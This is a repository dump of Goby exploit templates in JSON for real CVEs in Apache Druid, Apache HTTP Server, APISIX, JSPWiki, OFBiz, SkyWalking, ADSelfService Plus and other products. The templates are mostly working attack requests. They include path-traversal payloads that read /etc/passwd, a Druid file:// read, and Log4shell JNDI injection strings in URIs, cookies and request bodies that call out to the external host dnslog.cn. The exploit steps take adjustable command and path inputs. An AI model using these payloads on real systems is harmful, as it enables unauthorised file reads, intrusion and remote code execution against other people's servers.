├── ADSelfService_Plus_RCE_CVE_2021_40539.json ├── Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json ├── Apache_Airflow_Unauthorized.json ├── Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Log4shell_CVE_2021_44228.json ├── Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json ├── Apache_HTTP_Server_SSRF_CVE_2021_40438.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json ├── Apache_OFBiz_Log4shell_CVE_2021_44228.json ├── Apache_SkyWalking_Log4shell_CVE_2021_44228.json ├── Aspcms_Backend_Leak.json ├── Cacti_Weathermap_File_Write.json ├── Citrix_Unauthorized_CVE_2020_8193.json ├── ClickHouse_SQLI.json ├── Coldfusion_LFI_CVE_2010_2861.json ├── Confluence_RCE_CVE_2021_26084.json ├── Consul_Rexec_RCE.json ├── Couch_CMS_Infoleak_CVE_2018_7662.json ├── Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json ├── Couchdb_Unauth.json ├── CraftCMS_Seomatic_RCE_CVE_2020_9597.json ├── Datang_AC_Default_Password.json ├── DedeCMS_Carbuyaction_FileInclude.json ├── DedeCMS_InfoLeak_CVE_2018_6910.json ├── Discuz_ML_3.x_RCE__CNVD_2019_22239.json ├── Discuz_RCE_WOOYUN_2010_080723.json ├── Discuz_Wechat_Plugins_Unauth.json ├── Discuz_v72_SQLI.json ├── Dlink_850L_Info_Leak.json ├── Dlink_Info_Leak_CVE_2019_17506.json ├── Dlink_RCE_CVE_2019_16920.json ├── Docker_Registry_API_Unauth.json ├── Dubbo_Admin_Default_Password.json ├── Fastmeeting_Arbitrary_File_Read.json ├── FineReport_v9_Arbitrary_File_Overwrite.json ├── Gitlab_RCE_CVE_2021_22205.json ├── Grafana_Plugins_Arbitrary_File_Read.json ├── Hikvision_RCE_CVE_2021_36260.json ├── Jellyfin_SSRF_CVE_2021_29490.json ├── Konga_Default_JWT_KEY.json ├── Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json ├── MobileIron_Log4shell_CVE_2021_44228.json ├── Node_RED_ui_base_Arbitrary_File_Read.json ├── README.md ├── Security_Devices_Hardcoded_Password.json ├── SonarQube_unauth_CVE_2020_27986.json ├── Struts2_Log4Shell_CVE_2021_44228_1.json ├── 
Struts2_Log4Shell_CVE_2021_44228_2.json ├── Struts2_Log4Shell_CVE_2021_44228_3.json ├── UniFi_Network_Log4shell_CVE_2021_44228.json ├── VENGD_Arbitrary_File_Upload.json ├── VMWare_Horizon_Log4shell_CVE_2021_44228.json ├── VMware_NSX_Log4shell_CVE_2021_44228.json ├── VMware_vCenter_Log4shell_CVE_2021_44228_1.json ├── VMware_vCenter_v7.0.2_Arbitrary_File_Read.json ├── Weaver_EOffice_Arbitrary_File_Upload_CNVD_2021_49104.json ├── YAPI_RCE.json └── alibaba_canal_default_password.json /ADSelfService_Plus_RCE_CVE_2021_40539.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ADSelfService Plus RCE CVE-2021-40539", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce", 6 | "unauth" 7 | ], 8 | "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")", 9 | "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行", 10 | "Product": "ADSelfService Plus", 11 | "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html", 12 | "Author": "aetkrad", 13 | "Impact": "", 14 | "Recommendation": "", 15 | "References": [ 16 | "https://forum.butian.net/share/876" 17 | ], 18 | "HasExp": false, 19 | "ExpParams": null, 20 | "ExpTips": { 21 | "Type": "", 22 | "Content": "" 23 | }, 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/./RestAPI/LogonCustomization", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "methodToCall=previewMobLogo", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": 
"$body", 52 | "operation": "contains", 53 | "value": "var d = new Date();", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | "value": "window.parent.$(\"#tabLogo\")", 61 | "bz": "" 62 | } 63 | ] 64 | }, 65 | "SetVariable": [ 66 | "output|lastbody|regex|" 67 | ] 68 | } 69 | ], 70 | "PostTime": "2021-11-30 20:01:22", 71 | "GobyVersion": "1.9.310" 72 | } -------------------------------------------------------------------------------- /Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache APISIX Dashboard RCE CVE-2021-45232", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title==\"Apache APISIX Dashboard\"", 8 | "Description": "Apache APISIX Dashboard migrate接口存在未授权访问漏洞,可下载路由配置文件以及上传配置文件,导致存在命令执行。", 9 | "Product": "Apache APISIX Dashboard", 10 | "Homepage": "https://apisix.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247487772&idx=2&sn=09b6c93b14f10f4cb41aecc94ce71c75" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/apisix/admin/migrate/export", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "Consumers\":[],\"Routes\":", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | 
"value": "PluginConfigs\":", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "ExploitSteps": [ 68 | "AND", 69 | { 70 | "Request": { 71 | "method": "GET", 72 | "uri": "/apisix/admin/migrate/export", 73 | "follow_redirect": false, 74 | "header": null, 75 | "data_type": "text", 76 | "data": "", 77 | "set_variable": [] 78 | }, 79 | "ResponseTest": { 80 | "type": "group", 81 | "operation": "AND", 82 | "checks": [ 83 | { 84 | "type": "item", 85 | "variable": "$code", 86 | "operation": "==", 87 | "value": "200", 88 | "bz": "" 89 | }, 90 | { 91 | "type": "item", 92 | "variable": "$body", 93 | "operation": "contains", 94 | "value": "Consumers\":[],\"Routes\":", 95 | "bz": "" 96 | }, 97 | { 98 | "type": "item", 99 | "variable": "$body", 100 | "operation": "contains", 101 | "value": "PluginConfigs\":", 102 | "bz": "" 103 | } 104 | ] 105 | }, 106 | "SetVariable": [ 107 | "output|lastbody|regex|" 108 | ] 109 | } 110 | ], 111 | "PostTime": "2021-12-30 17:02:19", 112 | "GobyVersion": "1.9.320" 113 | } -------------------------------------------------------------------------------- /Apache_Airflow_Unauthorized.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Airflow Unauthorized", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "app=\"APACHE-Airflow\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-Airflow", 10 | "Homepage": "https://airflow.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

This allows unauthenticated users to reach that endpoint and add or modify the Airflow variables used in DAGs.

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/admin/", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Airflow - DAGs", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "DAGs", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "PostTime": "2021-10-31 15:32:53", 66 | "GobyVersion": "1.8.302" 67 | } -------------------------------------------------------------------------------- /Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Druid Abritrary File Read CVE-2021-36749", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "title=\"Apache Druid\"", 8 | "Description": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. 
But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.", 9 | "Product": "Druid", 10 | "Homepage": "https://druid.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/1iGsy2KpiijihtJ3M2Tdzw" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "POST", 34 | "uri": "/druid/indexer/v1/sampler?for=connect", 35 | "follow_redirect": false, 36 | "header": { 37 | "Accept": "application/json, text/plain, */*", 38 | "Content-Type": "application/json;charset=UTF-8" 39 | }, 40 | "data_type": "text", 41 | "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}", 42 | "set_variable": [] 43 | }, 44 | "ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "200", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": 
"root:x:", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "POST", 74 | "uri": "/druid/indexer/v1/sampler?for=connect", 75 | "follow_redirect": false, 76 | "header": { 77 | "Accept": "application/json, text/plain, */*", 78 | "Content-Type": "application/json;charset=UTF-8" 79 | }, 80 | "data_type": "text", 81 | "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file://{{{Path}}}\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}", 82 | "set_variable": [] 83 | }, 84 | "ResponseTest": { 85 | "type": "group", 86 | "operation": "AND", 87 | "checks": [ 88 | { 89 | "type": "item", 90 | "variable": "$code", 91 | "operation": "==", 92 | "value": "200", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody||" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-23 17:14:35", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /Apache_Druid_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Druid Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title==\"Apache Druid\"", 8 | "Description": "Apache Druid存在log4j漏洞。", 9 | "Product": "Apache Druid", 10 | "Homepage": "https://druid.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | 
"https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7bjndi:ldap:%2f%2fdnslog.cn%2ftea%7d" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "DELETE", 61 | "uri": "/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{{dnstest}}}%2ftea%7d", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 
114 | { 115 | "Request": { 116 | "method": "DELETE", 117 | "uri": "/druid/coordinator/v1/lookups/config/{{{cmd}}}", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2021-12-30 11:00:21", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)", 3 | "Level": "2", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "(server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\"Apache\")", 8 | "Description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.", 9 | "Product": "Apache HTTP Server", 10 | "Homepage": "http://httpd.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

read arbitrary files

", 13 | "Recommendation": "", 14 | "References": [ 15 | "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Filepath", 21 | "Type": "input", 22 | "Value": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:0:0:root:", 57 | "bz": "" 58 | } 59 | ] 60 | }, 61 | "SetVariable": [ 62 | "output|lastbody||" 63 | ] 64 | } 65 | ], 66 | "ExploitSteps": [ 67 | "AND", 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 72 | "follow_redirect": false, 73 | "header": null, 74 | "data_type": "text", 75 | "data": "", 76 | "set_variable": [] 77 | }, 78 | "ResponseTest": { 79 | "type": "group", 80 | "operation": "AND", 81 | "checks": [ 82 | { 83 | "type": "item", 84 | "variable": "$code", 85 | "operation": "==", 86 | "value": "200", 87 | "bz": "" 88 | }, 89 | { 90 | "type": "item", 91 | "variable": "$body", 92 | "operation": "contains", 93 | "value": "root:x:0:0:root:", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-10-28 10:10:27", 104 | "GobyVersion": "1.8.302" 105 | } -------------------------------------------------------------------------------- /Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache JSPWiki Log4shell CVE-2021-44228 (2)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(body=\"
JSPWiki\" | title=\"JSPWiki\")", 8 | "Description": "Apache JSPWiki /wiki存在log4j漏洞。", 9 | "Product": "JSPWiki", 10 | "Homepage": "https://jspwiki.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzA5OTA0MTU4Mg==&mid=2247485581&idx=1&sn=033cafb1442d44e6cfc85796e42f206d" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7Bjndi:ldap:$%7B::-/%7D/xxxdnslog.cn/tea%7D" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/wiki/$%7Bjndi:ldap:$%7B::-/%7D/{{{dnstest}}}/tea%7D", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [ 72 | { 73 | "type": "item", 74 | "variable": "$code", 75 | "operation": "==", 76 | "value": "200", 77 | "bz": "" 78 | } 79 | ] 80 | }, 81 | "SetVariable": [ 82 | "output|lastbody|regex|" 83 | ] 84 | }, 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "http://www.dnslog.cn/getrecords.php", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 
| "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | }, 106 | { 107 | "type": "item", 108 | "variable": "$body", 109 | "operation": "contains", 110 | "value": "{{{dnstest}}}", 111 | "bz": "" 112 | } 113 | ] 114 | }, 115 | "SetVariable": [ 116 | "output|lastbody|regex|" 117 | ] 118 | } 119 | ], 120 | "ExploitSteps": [ 121 | "AND", 122 | { 123 | "Request": { 124 | "method": "POST", 125 | "uri": "/wiki/{{{cmd}}}", 126 | "follow_redirect": false, 127 | "header": null, 128 | "data_type": "text", 129 | "data": "", 130 | "set_variable": [] 131 | }, 132 | "ResponseTest": { 133 | "type": "group", 134 | "operation": "AND", 135 | "checks": [ 136 | { 137 | "type": "item", 138 | "variable": "$code", 139 | "operation": "==", 140 | "value": "200", 141 | "bz": "" 142 | } 143 | ] 144 | }, 145 | "SetVariable": [ 146 | "output|lastbody|regex|" 147 | ] 148 | } 149 | ], 150 | "PostTime": "2021-12-27 15:00:47", 151 | "GobyVersion": "1.9.310" 152 | } -------------------------------------------------------------------------------- /Apache_OFBiz_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache OFBiz Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(port=\"8443\" | protocol=\"https\")", 8 | "Description": "Apache OFBiz 存在log4j漏洞。", 9 | "Product": "Apache OFBiz", 10 | "Homepage": "https://ofbiz.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://{{{dnstest}}}/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": 
"http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/webtools/control/main", 62 | "follow_redirect": false, 63 | "header": { 64 | "Cookie": "OFBiz.Visitor=${jndi:ldap://{{{dnstest}}}/tea}" 65 | }, 66 | "data_type": "text", 67 | "data": "", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "contains", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "GET", 119 | "uri": "/webtools/control/main", 120 | "follow_redirect": false, 121 | "header": { 122 | "Cookie": "OFBiz.Visitor={{{cmd}}}" 123 | }, 124 | "data_type": "text", 125 | "data": "", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": 
[ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-05 13:28:40", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /Apache_SkyWalking_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache SkyWalking Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( app=\"SkyWalking\" | title=\"Skywalking\" )", 8 | "Description": "Apache SkyWalking 存在Log4j漏洞。", 9 | "Product": "Apache SkyWalking", 10 | "Homepage": "https://skywalking.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:dns://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/graphql", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "{\"query\":\"${jndi:dns://{{{dnstest}}}/tea}\",\"variables\":{\"duration\":{\"start\":\"2021-12-22 1259\",\"end\":\"2021-12-22 1314\",\"step\":\"MINUTE\"}}}", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 
